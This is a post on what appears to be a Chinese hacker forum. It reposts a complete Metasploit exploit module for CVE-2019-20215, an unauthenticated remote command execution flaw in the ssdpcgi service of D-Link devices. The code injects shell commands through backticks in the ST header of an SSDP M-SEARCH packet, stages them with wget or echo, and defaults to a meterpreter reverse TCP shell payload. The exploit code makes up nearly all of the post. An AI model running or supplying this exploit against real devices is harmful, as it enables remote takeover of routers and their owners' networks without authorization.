• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

D-Link设备-ssdpcgi Exploit中未经身份验证的远程命令执行


This Wind

Recommended Posts

发布内容作者:Metasploit                                              漏洞危害等级:critlow_4.gif〔严重〕

 

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::CmdStager
 
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi',
      'Description' => %q{
        D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi.
      },
      'Author'      =>
        [
          's1kr10s',
          'secenv'
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['CVE', '2019-20215'],
          ['URL', 'https://medium.com/@s1kr10s/2e799acb8a73']
        ],
      'DisclosureDate' => 'Dec 24 2019',
      'Privileged'     => true,
      'Platform'       => 'linux',
      'Arch'        => ARCH_MIPSBE,
      'DefaultOptions' =>
        {
            'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',
            'CMDSTAGER::FLAVOR' => 'wget',
            'RPORT' => '1900'
        },
      'Targets'        =>
        [
          [ 'Auto',     { } ],
        ],
      'CmdStagerFlavor' => %w{ echo wget },
      'DefaultTarget'  => 0
      ))
 
  register_options(
    [
      Msf::OptEnum.new('VECTOR',[true, 'Header through which to exploit the vulnerability', 'URN', ['URN', 'UUID']])
    ])
  end
 
  def exploit
    execute_cmdstager(linemax: 1500)
  end
 
  def execute_command(cmd, opts)
    type = datastore['VECTOR']
    if type == "URN"
      print_status("Target Payload URN")
      val = "urn:device:1;`#{cmd}`"
    else
      print_status("Target Payload UUID")
      val = "uuid:`#{cmd}`"
    end
 
    connect_udp
    header = "M-SEARCH * HTTP/1.1\r\n"
    header << "Host:239.255.255.250: " + datastore['RPORT'].to_s + "\r\n"
    header << "ST:#{val}\r\n"
    header << "Man:\"ssdp:discover\"\r\n"
    header << "MX:2\r\n\r\n"
    udp_sock.put(header)
    disconnect_udp
  end
end
 
#  0day.today [2020-03-20]  #

 

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now